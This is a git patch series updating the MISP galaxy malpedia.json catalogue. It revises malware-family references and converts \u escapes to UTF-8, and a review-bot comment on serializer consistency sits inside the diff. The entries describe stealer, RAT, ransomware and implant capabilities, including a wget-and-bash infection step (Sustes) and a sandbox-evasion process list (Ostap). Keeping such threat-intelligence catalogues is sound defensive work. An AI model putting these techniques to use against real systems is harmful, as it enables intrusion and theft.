- "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/"
+ "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/",
+ "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/"
 ],
 "synonyms": [],
 "type": []
@@ -52243,21 +54768,22 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell",
 "https://content.fireeye.com/apt-41/rpt-apt41",
- "https://attack.mitre.org/groups/G0096",
- "https://lab52.io/blog/apt27-rootkit-updates/",
- "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html",
 "https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://github.com/smb01/zxshell",
- "https://blogs.cisco.com/security/talos/opening-zxshell",
- "https://attack.mitre.org/groups/G0001/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://risky.biz/whatiswinnti/",
 "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
- "https://risky.biz/whatiswinnti/"
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
+ "https://github.com/smb01/zxshell",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor",
+ "https://blogs.cisco.com/security/talos/opening-zxshell",
+ 
"https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://lab52.io/blog/apt27-rootkit-updates/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf" ], "synonyms": [ "Sensocode" @@ -52284,7 +54810,7 @@ "value": "ZxxZ" }, { - "description": "", + "description": "According to FireEye, Zyklon or Zyklon HTTP is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", @@ -52298,5 +54824,5 @@ "value": "Zyklon" } ], - "version": 17779 -} + "version": 19000 +} From 5d01afb537176bd841a6be37767213582366d6e2 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 26 Sep 2023 10:48:49 +0200 Subject: [PATCH 04/16] chg: [malpedia] jq all the things --- clusters/malpedia.json | 220 ++++++++++++++++++++--------------------- 1 file changed, 110 insertions(+), 110 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 46f5e10..29d50a2 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json 
@@ -1362,7 +1362,7 @@
 "value": "FluBot"
 },
 {
- "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims\u2019 credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
+ "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse",
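Review bot: Every hunk of this commit, starting with this FluHorse one, only replaces `\u2019`-style escapes with the literal UTF-8 character, which any RFC 8259 parser reads identically; the point is that two serializers are now in play, whatever produced the escaped form and the jq run that undid it, so the next malpedia sync will presumably flip all 110 lines back unless the sync tool is made to emit the same form. Pin one convention in the generator (ASCII-escaped output or literal UTF-8, but not alternating) so these diffs stay limited to content changes. With literal characters in the file, every consumer must read and write it as UTF-8 without a BOM, or the apostrophes and quotes in these descriptions become mojibake.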
@@ -1851,7 +1851,7 @@
 "value": "JadeRAT"
 },
 {
- "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google\u2019s official app store with the help of its trail signatures which includes updating the virus\u2019s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users\u2019 personal information including contact details, device data, WAP services, and SMS messages.",
+ "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker",
@@ -2028,7 +2028,7 @@
 "value": "Marcher"
 },
 {
- "description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers\u2019 goal is to steal credit card information.",
+ "description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers’ goal is to steal credit card information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred",
@@ -2967,7 +2967,7 @@
 "value": "Triada"
 },
 {
- "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
+ "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout"
@@ -4852,7 +4852,7 @@
 "value": "FontOnLake"
 },
 {
- "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. ",
+ "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog",
@@ -5188,7 +5188,7 @@
 "value": "Hive (ELF)"
 },
 {
- "description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor \u201cCamaro Dragon\u201d, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.",
+ "description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell",
@@ -5667,7 +5667,7 @@
 "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/"
 ],
 "synonyms": [
- "M\u00e9lof\u00e9e"
+ "Mélofée"
 ],
 "type": []
 },
@@ -6259,7 +6259,7 @@
 "value": "pupy (ELF)"
 },
 {
- "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.",
+ "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt",
@@ -6476,7 +6476,7 @@
 "value": "RedAlert Ransomware"
 },
 {
- "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm",
+ "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe",
@@ -6945,7 +6945,7 @@
 "value": "Sunless"
 },
 {
- "description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ",
+ "description": "Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes",
@@ -8072,7 +8072,7 @@ "value": "Ratty" }, { - "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99\u20ac for lifetime access but is currently available at a discounted 19.99\u20ac. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version", + "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus", 
@@ -8173,7 +8173,7 @@ "value": "Bateleur" }, { - "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", @@ -8249,7 +8249,7 @@ "value": "CukieGrab" }, { - "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA f\u00fcr C&C.", + "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA für C&C.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman", 
@@ -8418,7 +8418,7 @@
 "value": "grelos"
 },
 {
- "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
+ "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
@@ -8692,7 +8692,7 @@ "value": "NodeRAT" }, { - "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", + "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", 
@@ -9181,7 +9181,7 @@ "value": "CloudMensis" }, { - "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). 
The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version", + "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn’t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). 
The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim’s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim’s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", 
@@ -9355,7 +9355,7 @@ "value": "Dummy" }, { - "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment", + "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. 
After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim’s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", @@ -9536,7 +9536,7 @@ "value": "Gmera" }, { - "description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named L\u00ea Thu H\u00e0 (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.", + "description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", @@ -9976,7 +9976,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", 
@@ -10113,7 +10113,7 @@
 "value": "Shlayer"
 },
 {
- "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.",
+ "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow",
@@ -11080,7 +11080,7 @@
 "value": "PowerWare"
 },
 {
- "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
+ "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure",
@@ -12332,7 +12332,7 @@
 "value": "3CX Backdoor (Windows)"
 },
 {
- "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim\u2019s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
+ "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger",
@@ -12411,7 +12411,7 @@
 "value": "7ev3n"
 },
 {
- "description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with \u201cname-and-shame\u201d techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.",
+ "description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with “name-and-shame” techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base",
@@ -12676,7 +12676,7 @@
 "value": "Adamantium Thief"
 },
 {
- "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
+ "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
@@ -13042,7 +13042,7 @@
 "value": "Albaniiutas"
 },
 {
- "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
+ "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot",
@@ -13229,7 +13229,7 @@
 "value": "ALPC Local PrivEsc"
 },
 {
- "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user\u2019s screen and prohibits any interaction with the computer.",
+ "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware",
@@ -13282,7 +13282,7 @@
 "value": "AlphaSeed"
 },
 {
- "description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.",
+ "description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay",
@@ -13520,7 +13520,7 @@
 "value": "Andromeda"
 },
 {
